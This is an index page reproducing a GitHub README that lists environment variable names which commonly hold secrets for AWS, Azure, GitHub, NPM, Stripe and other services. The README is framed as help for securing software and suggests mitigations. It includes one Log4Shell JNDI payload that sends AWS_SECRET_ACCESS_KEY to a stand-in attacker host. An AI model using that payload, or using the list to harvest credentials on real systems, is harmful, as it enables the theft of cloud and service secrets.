Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables
🦄🔒 Awesome list of secrets in environment variables 🖥️
https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables
List: awesome-list-of-secrets-in-environment-variables
blue-team bugbounttips bugbounty cve-2021-44228 cybersecurity exploit log4j pentesting poc red-team security security-writeups writeups
Last synced: about 1 month ago
JSON representation
🦄🔒 Awesome list of secrets in environment variables 🖥️
- Host: GitHub
- URL: https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables
- Owner: Puliczek
- Created: 2021-12-28T16:22:57.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2022-09-21T12:57:42.000Z (about 2 years ago)
- Last Synced: 2024-05-20T09:00:32.935Z (7 months ago)
- Topics: blue-team, bugbounttips, bugbounty, cve-2021-44228, cybersecurity, exploit, log4j, pentesting, poc, red-team, security, security-writeups, writeups
- Homepage:
- Size: 62.5 KB
- Stars: 850
- Watchers: 20
- Forks: 73
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Contributing: CONTRIBUTING.md
Awesome Lists containing this project
- Awesome - Awesome list of secrets in environment variables
- awesome-hacking-lists - Puliczek/awesome-list-of-secrets-in-environment-variables - 🦄🔒 Awesome list of secrets in environment variables 🖥️ (Others)
README
---
# **Awesome list of secrets in environment variables [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)**
# 📝 Description
List of secrets, passwords, API keys, tokens stored inside a system environment variables.
**An environment variable** is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.
Many developer documentations recommends storing secrets inside an environment variable, but is it the best way to keep secrets?
The attacker can read values inside system environment variable by using exploits:
- CVE-2021-44228 JNDI log4j (JAVA) ([Read more...](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words#1-system-environment-variables))
`${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}`Get **AWS_SECRET_ACCESS_KEY** or return **NO_EXISTS**
- CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on [Github](https://github.com/Puliczek) and [Twitter](https://twitter.com/pulik_io) 😉
- and much more...Because of that I created, a list of secrets in environment variables to help secure software.
Some of practices to avoid leak of secrets stored in environment variables is to:
- Block/notify on WAF when the request includes system environment variables
- Store in system environment variable path to a config file, instead of clean value
- Encrypt values inside environment variable
- Use different way to store secrets 🤓![Environment variables](https://user-images.githubusercontent.com/12344862/147656611-8726c036-128b-4ad4-a19b-c019c2d6b1ea.png)
You can check your system environment variables:
- Windows execute in PowerShell: `dir env:`
- Linux/MacOS execute in terminal: `printenv` or `env`# **Awesome list of secrets in environment variables**
# A
## AWS
- AWS_ACCESS_KEY_ID
- AWS_SECRET_ACCESS_KEY
- AMAZON_AWS_ACCESS_KEY_ID
- AMAZON_AWS_SECRET_ACCESS_KEYsource: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html
## Algolia
- ALGOLIA_API_KEYsource: https://www.algolia.com/doc/framework-integration/symfony/getting-started/installation/?client=php
## Azure
- AZURE_CLIENT_ID
- AZURE_CLIENT_SECRET
- AZURE_USERNAME
- AZURE_PASSWORD
- MSI_ENDPOINT
- MSI_SECRET
source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet
source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406
# B
## Binance
- binance_api
- binance_secret
source: https://algotrading101.com/learn/binance-python-api-guide/## Bittrex
- BITTREX_API_KEY
- BITTREX_API_SECRETsource: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md
# C
## Cloud Foundry
- CF_PASSWORD
- CF_USERNAMEsource: https://cli.cloudfoundry.org/en-US/v6/auth.html
## Code Climate
- CODECLIMATE_REPO_TOKENsource: https://docs.codeclimate.com/docs/command-line-interface
## Coveralls
- COVERALLS_REPO_TOKENsource: https://docs.coveralls.io/supported-ci-services
## CircleCI
- CIRCLE_TOKENsource: https://circleci.com/docs/2.0/api-developers-guide/
# D
## Digitalocean
- DIGITALOCEAN_ACCESS_TOKEN
source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean## Dockerhub
- DOCKER_EMAIL
- DOCKER_PASSWORD
- DOCKER_USERNAMEsource: https://github.com/marketplace/actions/publish-docker
## Dockerhub
- DOCKERHUB_PASSWORDsource: https://circleci.com/docs/2.0/env-vars/
# E
# F
## Fastlane products
- ITC_PASSWORDsource: https://github.com/phatblat/fastlane-variables
- FACEBOOK_APP_ID
- FACEBOOK_APP_SECRET
- FACEBOOK_ACCESS_TOKEN## Firebase
- FIREBASE_TOKEN
- FIREBASE_API_TOKENsource: https://firebase.google.com/docs/cli
## Fossa
- FOSSA_API_KEYsource: https://docs.fossa.com/docs/api-reference
# G
## Github
- GH_TOKEN
- GITHUB_TOKEN
- GH_ENTERPRISE_TOKEN
- GITHUB_ENTERPRISE_TOKENsource: https://cli.github.com/manual/gh_help_environment
## Gitlab
- CI_DEPLOY_PASSWORD
- CI_DEPLOY_USERsource: https://docs.gitlab.com/ee/user/project/deploy_tokens/
## Google Cloud
- GOOGLE_APPLICATION_CREDENTIALS
- GOOGLE_API_KEY
source: https://cloud.google.com/docs/authentication/getting-started#windows## Gitlab
- CI_DEPLOY_USER
- CI_DEPLOY_PASSWORD
- GITLAB_USER_LOGIN
- CI_JOB_JWT
- CI_JOB_JWT_V2
- CI_JOB_TOKENsource: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html
# H## Heroku
- HEROKU_API_KEY
- HEROKU_API_USERsource: https://devcenter.heroku.com/articles/authentication
# I
# J
# K
# L
# M
## Mailgun
- MAILGUN_API_KEY
source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/## MongoDB
- MCLI_PRIVATE_API_KEY
- MCLI_PUBLIC_API_KEYhttps://docs.mongodb.com/mongocli/stable/configure/environment-variables/
# N## NGROK
- NGROK_TOKEN
- NGROK_AUTH_TOKENsource: -
## NPM
- NPM_TOKEN
- NPM_AUTH_TOKENsource: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow
# O
## OKTA
- OKTA_CLIENT_ORGURL
- OKTA_CLIENT_TOKEN
- OKTA_OAUTH2_CLIENTSECRET
- OKTA_OAUTH2_CLIENTID
- OKTA_AUTHN_GROUPIDsource: https://developer.okta.com/okta-sdk-java/apidocs/com/okta/sdk/client/ClientBuilder.html
## Oracle OpenStack command-line client
- OS_USERNAME
- OS_PASSWORDsource: [https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html](https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html)
source: https://docs.oracle.com/cd/E78305_01/E78304/html/openstack-envars.html# P
## Percy.io
- PERCY_TOKENsource: https://docs.percy.io/docs/environment-variables
## PostgreSQL
- POSTGRES_PASSWORDsource: https://www.postgresql.org/docs/current/libpq-envars.html
# Q
# R
# S
## Sauce Labs
- SAUCE_ACCESS_KEY
- SAUCE_USERNAMEsource: https://docs.saucelabs.com/basics/environment-variables/
## Sentry
- SENTRY_AUTH_TOKENsource: https://docs.sentry.io/product/cli/configuration/
## Slack
- SLACK_TOKENsource: https://slack.dev/node-slack-sdk/getting-started
## Square
- square_access_token
- square_oauth_secretsource: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme
## Stripe
- STRIPE_API_KEY
- STRIPE_DEVICE_NAMEsource: https://stripe.com/docs/cli/api_keys
## Surge
- SURGE_TOKEN
- SURGE_LOGINsource: https://surge.sh/help/integrating-with-circleci
# T
## Twilio
- TWILIO_ACCOUNT_SID
- TWILIO_AUTH_TOKENSource: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html
- CONSUMER_KEY
- CONSUMER_SECRETsource: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices
## Travis Ci
- TRAVIS_SUDO
- TRAVIS_OS_NAME
- TRAVIS_SECURE_ENV_VARSsource: https://docs.travis-ci.com/user/environment-variables
## Telegram
- TELEGRAM_BOT_TOKEN# U
# V
## Vault HashiCorp
- VAULT_TOKEN
- VAULT_CLIENT_KEY
source: https://www.vaultproject.io/docs/commands## Vultr
- TOKEN
- VULTR_ACCESS
- VULTR_SECRETsource: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops
# W
# X
# Y
# Z## Get a RAW list:
The repository includes the raw list:
[raw_list.txt](https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables/blob/main/raw_list.txt)
It is auto-generated from README.md by GitHub action.
# 😎 Contributing
👍🎉 First off, thanks for taking the time to contribute! 🎉👍If you would like to add more secrets:
[Please read and follow our Contributing guide](https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables/blob/main/CONTRIBUTING.md)Thanks! 🦄
# 💻 Useful links
- [Stackoverflow - Is it secure to store passwords as environment variables (rather than as plain text) in config files?](https://stackoverflow.com/questions/12461484/is-it-secure-to-store-passwords-as-environment-variables-rather-than-as-plain-t)
- [Google - Best practices for securely using API keys](https://support.google.com/googleapi/answer/6310037?hl=en)
- [An Introduction to Environment Variables and How to Use Them](https://medium.com/chingu/an-introduction-to-environment-variables-and-how-to-use-them-f602f66d15fa)
- [Why you shouldn't use ENV variables for secret data](https://diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/)
- [The Triumph and Tragedy of .env Files](https://blog.doppler.com/the-triumph-and-tragedy-of-env-files)# 🤝 Show your support
# ✔️ Disclaimer
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.